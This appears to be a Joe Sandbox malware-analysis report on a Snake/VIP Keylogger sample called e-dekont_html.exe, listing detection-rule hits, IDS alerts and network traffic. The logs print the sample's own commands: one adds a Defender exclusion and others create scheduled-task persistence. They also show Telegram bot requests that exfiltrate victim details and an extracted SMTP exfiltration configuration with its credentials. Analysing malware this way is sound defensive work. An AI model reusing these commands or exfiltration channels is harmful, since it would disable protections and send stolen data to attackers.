0.2.e-dekont_html.exe.4357f18.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e2ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc10ce:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d951:$a3: \Google\Chrome\User Data\Default\Login Data 0xc0771:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data 0x7dbae:$a4: \Orbitum\User Data\Default\Login Data 0xc09ce:$a4: \Orbitum\User Data\Default\Login Data 0x3b56d:$a5: \Kometa\User Data\Default\Login Data 0x7e58d:$a5: \Kometa\User Data\Default\Login Data 0xc13ad:$a5: \Kometa\User Data\Default\Login Data
0.2.e-dekont_html.exe.4357f18.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x72084:$s1: UnHook 0xb4ea4:$s1: UnHook 0x2f06b:$s2: SetHook 0x7208b:$s2: SetHook 0xb4eab:$s2: SetHook 0x2f073:$s3: CallNextHook 0x72093:$s3: CallNextHook 0xb4eb3:$s3: CallNextHook 0x2f080:$s4: _hook 0x720a0:$s4: _hook 0xb4ec0:$s4: _hook
11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x72084:$s1: UnHook 0xb4ea4:$s1: UnHook 0x2f06b:$s2: SetHook 0x7208b:$s2: SetHook 0xb4eab:$s2: SetHook 0x2f073:$s3: CallNextHook 0x72093:$s3: CallNextHook 0xb4eb3:$s3: CallNextHook 0x2f080:$s4: _hook 0x720a0:$s4: _hook 0xb4ec0:$s4: _hook
Click to see the 47 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\e-dekont_html.exe", ParentImage: C:\Users\user\Desktop\e-dekont_html.exe, ParentProcessId: 7624, ParentProcessName: e-dekont_html.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", ProcessId: 7848, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpFE1C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpFE1C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe, ParentImage: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe, ParentProcessId: 2064, ParentProcessName: HvgRSvNGGXnNtV.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpFE1C.tmp", ProcessId: 6500, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\e-dekont_html.exe", ParentImage: C:\Users\user\Desktop\e-dekont_html.exe, ParentProcessId: 7624, ParentProcessName: e-dekont_html.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp", ProcessId: 7944, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\e-dekont_html.exe", ParentImage: C:\Users\user\Desktop\e-dekont_html.exe, ParentProcessId: 7624, ParentProcessName: e-dekont_html.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", ProcessId: 7848, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\e-dekont_html.exe", ParentImage: C:\Users\user\Desktop\e-dekont_html.exe, ParentProcessId: 7624, ParentProcessName: e-dekont_html.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp", ProcessId: 7944, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-06T11:15:40.272859+0100	2803305	3	Unknown Traffic	192.168.2.7	49728	104.21.96.1	443	TCP
2025-02-06T11:15:41.719867+0100	2803305	3	Unknown Traffic	192.168.2.7	49741	104.21.96.1	443	TCP
2025-02-06T11:15:43.214395+0100	2803305	3	Unknown Traffic	192.168.2.7	49755	104.21.96.1	443	TCP
2025-02-06T11:15:44.446620+0100	2803305	3	Unknown Traffic	192.168.2.7	49762	104.21.96.1	443	TCP
2025-02-06T11:15:44.922457+0100	2803305	3	Unknown Traffic	192.168.2.7	49768	104.21.96.1	443	TCP
2025-02-06T11:15:48.753897+0100	2803305	3	Unknown Traffic	192.168.2.7	49804	104.21.96.1	443	TCP
2025-02-06T11:15:49.277462+0100	2803305	3	Unknown Traffic	192.168.2.7	49805	104.21.96.1	443	TCP
2025-02-06T11:15:51.746919+0100	2803305	3	Unknown Traffic	192.168.2.7	49829	104.21.96.1	443	TCP
2025-02-06T11:15:54.980221+0100	2803305	3	Unknown Traffic	192.168.2.7	49855	104.21.96.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-06T11:15:38.868025+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49710	132.226.8.169	80	TCP
2025-02-06T11:15:39.868020+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49710	132.226.8.169	80	TCP
2025-02-06T11:15:41.180531+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49735	132.226.8.169	80	TCP
2025-02-06T11:15:42.430468+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49742	132.226.8.169	80	TCP
2025-02-06T11:15:42.789911+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49748	132.226.8.169	80	TCP
2025-02-06T11:15:43.477487+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49742	132.226.8.169	80	TCP
2025-02-06T11:15:45.310203+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49769	132.226.8.169	80	TCP
2025-02-06T11:15:46.727430+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49783	132.226.8.169	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-06T11:15:51.579892+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	49827	149.154.167.220	443	TCP
2025-02-06T11:15:56.069453+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	49861	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Virustotal: Detection: 52%			Perma Link

Multi AV Scanner detection for submitted file

Source: e-dekont_html.exe	Virustotal: Detection: 52%			Perma Link
Source: e-dekont_html.exe	ReversingLabs: Detection: 42%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: e-dekont_html.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: e-dekont_html.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.7:49722 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.7:49754 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49861 version: TLS 1.2

Source: e-dekont_html.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: QrSB.pdb source: e-dekont_html.exe, HvgRSvNGGXnNtV.exe.0.dr
Source:	Binary string: QrSB.pdbSHA256 source: e-dekont_html.exe, HvgRSvNGGXnNtV.exe.0.dr

Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 0864CEF9h	0_2_0864C760
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 0161F8E9h	10_2_0161F631
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 0161FD41h	10_2_0161FA88
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 06E50D0Dh	10_2_06E50B30
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 06E51697h	10_2_06E50B30
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 06E5FAB9h	10_2_06E5F810
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 06E531E0h	10_2_06E52DC8
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 06E52C19h	10_2_06E52968
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 06E5E959h	10_2_06E5E6B0
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 06E5E501h	10_2_06E5E258
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 06E5E0A9h	10_2_06E5DE00
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 06E5F661h	10_2_06E5F3B8
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 06E5F209h	10_2_06E5EF60
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 06E5EDB1h	10_2_06E5EB08
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 06E5D3A1h	10_2_06E5D0F8
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 06E5CF49h	10_2_06E5CCA0
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_06E50040
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 06E5DC51h	10_2_06E5D9A8
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 06E531E0h	10_2_06E52DBF
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 06E5D7F9h	10_2_06E5D550
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 4x nop then jmp 06E531E0h	10_2_06E5310E
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 4x nop then jmp 07C4C159h	11_2_07C4B9C0
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 4x nop then jmp 00EFF8E9h	16_2_00EFF631
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 4x nop then jmp 00EFFD41h	16_2_00EFFA88

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49861 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49827 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.7:54889 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2006/02/2025%20/%2017:39:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2006/02/2025%20/%2017:09:47%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49748 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49769 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49735 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49783 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49710 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49742 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49755 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49741 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49728 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49829 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49762 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49768 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49804 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49855 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49805 -> 104.21.96.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.7:49722 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.7:49754 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2006/02/2025%20/%2017:39:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
